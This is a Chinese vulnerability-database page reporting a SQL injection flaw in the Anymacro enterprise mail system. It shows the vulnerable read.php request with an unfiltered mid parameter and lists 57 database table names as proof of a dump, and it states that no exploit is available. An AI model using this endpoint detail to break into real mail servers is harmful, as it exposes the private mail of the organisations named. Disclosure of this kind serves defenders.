|Anymacro 邮件系统最新版SQL注入漏洞造成邮件泄露（通杀所有邮件服务器）

Anymacro 邮件系统最新版SQL注入漏洞造成邮件泄露（通杀所有邮件服务器）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述：疯狗叔叔、Finger xsser ，我还有几枚怎么不帮我审核了？ ### 详细说明：疯狗叔叔、Finger xsser ，我还有几枚怎么不帮我审核了？ 0x001 背景 anymacro已经被列入奖励名单了。 0x001 背景 anymacro是国内较流行的一家企业级邮箱系统，客户主要为教育/政府机构。今天所发现的SQL注入影响所有Anymacro所有邮件系统。例如近期项目，都是超大企业或者是单位：安宁中标中国航天科技集团邮件系统建设项目安宁承接中国海关总署邮件系统项目安宁中标中国社科院邮件系统项目安宁中标中国外交部邮件系统建设项目安宁中标中国光大银行邮件系统项目 0x002 漏洞分析本次属于黑盒测试。。。 ``` GET /read.php?mid=11328442 HTTP/1.1 Host: mail.xxxx.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: cusername=swl; PHPSESSID=a1m90h20j4klu2h9qcico8r541; LOGIN_AUTH_CODE=3; lang=cn; r=13.14004852901104478900.451702001400485290; se=2f068a825c168af5d781156e47efc802 Connection: keep-alive ``` 由于在读取过程当中未过滤，导致产生SQL注入漏洞，严重可导致邮件任意文件读取。。。可成功注入管理员用户。 [<img src="https://images.seebug.org/upload/201405/19162521f4e0e42b2abefd6ee996fe8ad591cd82.jpg" alt="Q$%GII311(IG]QVIK}`F0P1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/19162521f4e0e42b2abefd6ee996fe8ad591cd82.jpg) [<img src="https://images.seebug.org/upload/201405/19162547fa8c5a8016e57e0a18bbbb8ff1038a87.jpg" alt="LSOHP1C00F)(SSJ7~5M8G%V.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/19162547fa8c5a8016e57e0a18bbbb8ff1038a87.jpg) [<img src="https://images.seebug.org/upload/201405/19162618da54d978517acda8ff12488c5e2ecd0b.jpg" alt="~G@M@06NRXV4{DEG}1E14W3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/19162618da54d978517acda8ff12488c5e2ecd0b.jpg) [57 tables] +------------------------+ | archive_mail | | attlist | | audis | | audit_log | | conc_link | | exchange_userauth | | ext_spam_hourreport | | ext_spam_log | | ipmaps | | log_bounce | | log_report_hour | | login_log | | login_pass_log | | login_safe_log | | m_log | | m_log_qid | | m_log_spam | | mail_boxs | | mailattlist | | maildir | | maildomainreport_day | | maildomainreport_month | | mailidlist | | mailidlist_sync | | mailinfo | | mailreport_day | | mailreport_month | | netdisklink | | old_userauth | | pop3set | | pop_limit_ip | | push_dev | | push_stat | | regmail | | report_login_hour | | send_rate | | sendquque | | sendstatus | | short_link | | sms_log | | user_del_info | | userspace_sync | | vcl_attendee | | vcl_calendar | | vcl_class | | vcl_config | | vcl_config_remind | | vcl_external | | vcl_ics | | vcl_ics_attendee | | vcl_modify | | vcl_partner | | vcl_remind | | vcl_remind_time | | vcl_share_user | | zsy_migsch | | zsy_sync | +------------------------+ [<img src="https://images.seebug.org/upload/201405/19162658af7b67ed63cadeb1f22b31d7c9851f2c.jpg" alt="EILPUHXV1YF]($V8MQ}`SAO.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/19162658af7b67ed63cadeb1f22b31d7c9851f2c.jpg) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201405/19162521f4e0e42b2abefd6ee996fe8ad591cd82.jpg" alt="Q$%GII311(IG]QVIK}`F0P1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/19162521f4e0e42b2abefd6ee996fe8ad591cd82.jpg) [<img src="https://images.seebug.org/upload/201405/19162547fa8c5a8016e57e0a18bbbb8ff1038a87.jpg" alt="LSOHP1C00F)(SSJ7~5M8G%V.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/19162547fa8c5a8016e57e0a18bbbb8ff1038a87.jpg) [<img src="https://images.seebug.org/upload/201405/19162618da54d978517acda8ff12488c5e2ecd0b.jpg" alt="~G@M@06NRXV4{DEG}1E14W3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/19162618da54d978517acda8ff12488c5e2ecd0b.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™